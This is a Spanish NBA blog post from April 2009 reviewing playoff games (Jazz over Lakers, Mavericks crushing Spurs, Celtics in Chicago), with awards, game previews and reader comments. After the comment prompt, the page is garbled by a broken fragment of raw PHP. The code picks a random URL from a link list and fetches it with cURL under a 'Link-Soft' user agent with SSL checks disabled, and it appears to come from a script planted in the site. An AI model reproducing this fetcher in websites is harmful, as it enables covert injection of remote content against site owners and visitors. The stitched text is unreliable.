Playoffs (23/04/2009): Despertares

24 de April de 2009 por TheDeerHunter

By TheDeerHunter & Txusma

Hay que decirlo ya. Emocionante e igualadísima la primera ronda de este año. Tan sólo los Cavs se mantienen invictos y esta noche viajan a Detroit.

Anoche palmaron los Lakers que, seamos sinceros, estaban pidiendo a gritos que alguien les tocara ya la cara. Es de todos los equipos el que ha mostrado unos biorritmos más bajos esta postemporada, sacando adelante su eliminatoria casi por aburrimiento, adormilados frente a un rival que era un querer y no poder. Pero anoche, desde el principio, se vio que las cosas iban a ser ligeramente diferentes. Y es que si en los dos primeros partidos los amarillos arrasaron en el primer cuarto, anotando como les daba la gana, en éste se vieron agobiados en cuanto pusieron el pie en el parquet del Energy Solutions. Por fin pudimos disfrutar de unos Jazz con la mala baba que les caracteriza. Ya era hora.

Al aumento de la presión local, se le unió la incompetencia de Bynum y Fisher, a la que se unieron la de Ariza o Shannon Brown que tan bien lo habían hecho hasta el momento. A Kobe le costó horrores producir y Pau tampoco empezó fino. Sólo Odom mantuvo el barco a flote ante las acometidas de un inconmensurable Boozer. Así y todo, los Lakers fueron recuperando la iniciativa e incluso se escaparon de más de 10 puntos al final del tercer cuarto, cuando desplegaron el mejor juego de toda la serie. Pero en el último, Odom se borró, Kobe no logró despegar y tampoco entraron los tiros decisivos de otros días. Ante una defensa ridícula los Jazz remontaron el partido. La puntilla la puso Deron Williams con un canastón a falta de dos segundos. El forzadísimo triple de Kobe no entró en esta ocasión.

En Dallas, Carlisle nos sorprendió a todos con una defensa a la que no estamos acostumbrados en el Oeste. El palizón que se llevaron los Spurs no lo recordaban ni los más viejos del lugar y la secada a Duncan y Parker no será olvidada durante un largo tiempo. Al final del tercer cuarto los Spurs habían anotado 42 puntos y caían por más de 30 de diferencia. El último, como es lógico, sobró. Veremos hasta que punto fue un accidente tremendo o el definitivo final de una era. Con los Spurs de por medio nunca se sabe.

Por último, los Celtics recuperaron el factor cancha en el mítico United Center. Por fin encontraron la forma de ahogar el juego exterior de los Bulls… otro detalle de equipo campeón por su forma de mutar durante la eliminatoria. Han ido corrigiendo hasta ir neutralizando todas y cada una de las armas ofensivas de su rival. Del Negro comienza a despertarse del sueño del primer partido y es que los Celtics son mucho Celtics.

PREMIOS

MVP: Sin Bynum en la pista por problemas de falta, Carlos Boozer campó a sus anchas por la zona angelina consiguiendo 23 puntos y ¡22 rebotes! De esta manera empata con Karl Malone como el jugador de los Jazz que más rebotes coge en un partido de Playoffs.

Rookie: Dudamos entre Derrick Rose y Gabe Pruitt. Uno jugó 32 minutos y anotó 9 puntos (4 de 14) y perdió 7 balones. El otro repartió una asistencia, puso un tapón y perdió un balón en 2 minutos y medio. Yo me quedo con Pruitt, la verdad.

Sorpresa: Su físico no dice mucho en su favor, pero los partidos que se está marcando Glen Davis en ausencia de Garnett son para enmarcar. Ayer jugó un completísimo partido con 14 puntos, 9 rebotes, 6 asistencias, 6 robos y 3 tapones. Números de auténtico crack.

Decepción: Penita, pena la que dieron los Spurs en el American Airlines Center de Dallas. Tanta, que a principios del tercer cuarto los titulares se sentaron en el banco y ya no volvieron a la pista. Como muestra de la debacle, los 4 puntos y 2 rebotes de Tim Duncan
Mención especial para las 5 faltas en 7 minutos de Andrew Bynum.

El mayor esfuerzo en vano: El de la pareja Odom-Gasol con 41 puntos y 23 rebotes entre ambos. Juntos, intentaron maquillar el mal día de Kobe Bryant pero no fue suficiente para llevarse la victoria.

RAZONES PARA TRASNOCHAR

– Cleveland @ Detroit (1.00h): Sin descartar una sorpresa producto de algun tipo de extrema relajación por parte de los Cavs, la verdad es que el partido se presenta como un capítulo más de la ya anunciada contundente derrota de los Pistons.

– Orlando @ Philadelphia (2.00h): Orlando necesita dar un golpe de autoridad para evitarse problemas futuros. Las estadísticas dicen que Orlando gana más partidos fuera que Philadelphia en casa. ¿Se cumplirán?

– Portland @ Houston (3.30h): Sin Mutombo los Rockets son más débiles en el juego interior, ¿pero serán capaces los Blazers de aprovecharlo? ¿Jugarán mas para Aldridge y Oden y menos para Roy?

Comenta

11 comentarios a esta entrada

  1. couxe dice:
    #1

    Para los Lakers lo peor es que algunos jugadores todavía se irían del partido contentos pensando que pudieron ganar, y que pueden seguir instalados en la modorra en la que llevan toda la eliminatoria…

    Por cierto, no sé si soy yo, pero veo a Gasol mucho más enchufado y con mucha menos tendencia a dejarse llevar que en otras ocasiones…

      Citar

  2. Txusma dice:
    #2

    Sin Powe, sin Garnett, en el United Center… y aún asi los Celtics apalizan a los Bulls. Hay equipos que no se pueden dar por muertos nunca.
    Lo de los Lakers no puede sino ser un ligero tropiezo que ha de servir para q se pongan las pilas. Yo apuesto por el 4-1. Y el siguiente partido ganado con facilidad.

      Citar

  3. TheDeerHunter dice:
    #3

    Hay un detalle que no debería pasarnos de largo.

    La eliminatoria que se está marcando Dampier es lo más increíble que ha hecho en su puñetera vida. ç
    Eso sí, tampoco era demasiado difícil superarse, lo es más defender a Duncan como lo está haciendo.

      Citar

  4. TheDeerHunter dice:
    #4

    … y no es por nada, pero no sé muy bien qué se han fumado en marca para decir lo del arbitraje casero en Salt Lake. Yo no lo vi así, para nada.
    Me da que tienen tendencia a emplear siempre la misma cantinela siempre que les conviene…

      Citar

  5. Txusma dice:
    #5

    Lo de los medios de comunicacion españoles creo q ya lo hemos comentado alguna vez. Yo por las mañanas soy informado convenientemente de como van las eliminatorias de Lakers y Blazers (si es q ese dia han jugado) pero no dicen ni ‘mu’ del resto. Con lo poco q les costaria. Son detallitos…

    De Dampier recuerdo una temporada que fue aun mas increible. En la 2003-2004 promedio 12 puntos y 12 rebotes para poder conseguir el contrato que tiene ahora que supera los 9 millones de dolares por año. Nunca más se ha acercado a los 10 rebotes por temporada… Q tio!!

      Citar

  6. aro_pasado_no_newtoniano dice:
    #6

    Lo de Glen Davis sigue sorprendiendo??

    LLeva una época post-Garnett tremenda. No le acompaña el físico, pero sólo a priori. En la historia del basket siempre ha habido gordos. Unos venían de ser unos adonis o unos hulk y esos nunca han hecho nada. Pero los hay que eran gordos casi que de nacimiento. Que se han visto expuestos a la burla y al bulling de los compañeros, y eso les ha hecho fuertes y les ha servido para controlar su cuerpo. Además creo que este bailaba claqué.

      Citar

  7. David dice:
    #7

    Precisamente por como son los medios de comunicación españoles en este sentido se agradece más que existan blogs como el vuestro 😉

      Citar

  8. Wookie dice:
    #8

    Estoy con David! os conoci en el All star en directo y desde entonces todos los dias os leo para enterarme de como va la NBA, muchas gracias por toda la información, es correcta fiable, muy entretenida y sin patriotismos innecesarios. Seguid así! Un saludo y Go Celtics! (aunque este año no lo veo…)

      Citar

  9. Jabho dice:
    #9

    Pues la cosa era defensa y secar a Gordon… con eso conseguido, la victoria ha sido fácil. El duelo Rose-Rondo de momento cae del lado verde (normal siendo el primer año de Rose). De momento se recupera la ventaja de campo y caso de jugar un buen partido el siguiente estaría casi resuelto. Sigue sin aparecer un gran Pierce y llegará seguro.

    Glen Davis es un crack. Tiene sus limitaciones pero las conoce y hace lo que sabe hacer. buen tirito a 4-5 metros sobre todo desde el lado izquierdo según se mira a la canasta. Y se mueve bien… un crack.

    Los Lakers han perdido un partido normal. La cosa es ganar el siguiente y no complicarse la vida, pero nada más.

    Y por Dallas ya apostamos algunos 😉

      Citar

  10. Landrusski dice:
    #10

    OYE…COMO ESTA MI AMIGO EL RONDO EEEEE JEJEJE EL OTRO DIA SE ENMARCO UN TRIPLE DOBLE Y AYER UN DOBLE DOBLE…ESPECTACULAAAAAAAAAAAR XD….SIGO OPINANDO KE ENTRE LSO 5 MEJORES BASES DE LA NBA(SE KE SOY PESAO JAJAJAJA…)

      Citar

  11. TheDeerHunter dice:
    #11

    mendrugo de mí… que al hablar de los equipos invictos he olvidado mencionar precísamente a Denver, con toda la que ha caído en torno a Billups vs Paul.

    asumo mi culpa y en parte os agradezco vuestra elegancia a la hora de echármelo en cara…

    y sin embargo, al callar, parte de culpa acerca del error recae sobre vuestros hombros… os pido que seáis precisos… aunque también constructivos y respetuosos. Como no puede ser de otra manera.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>